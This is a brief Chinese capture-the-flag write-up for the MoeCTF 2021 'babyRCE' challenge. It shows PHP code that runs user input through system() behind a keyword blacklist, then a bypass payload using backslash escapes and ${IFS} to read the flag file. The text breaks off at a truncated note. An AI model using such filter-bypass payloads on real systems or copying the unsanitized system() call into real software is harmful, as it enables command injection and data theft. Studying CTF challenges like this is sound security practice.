[TOC]
[MoeCTF 2021]babyRCE
考点:关键词过滤
来源:nssctf
123456789101112 <?php$rce = $_GET['rce'];if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; }} else { highlight_file(__FILE__);}
先用ls查看
构造payload:
1?rce=ca\t${IFS}fl\ag.php
注意:1. ...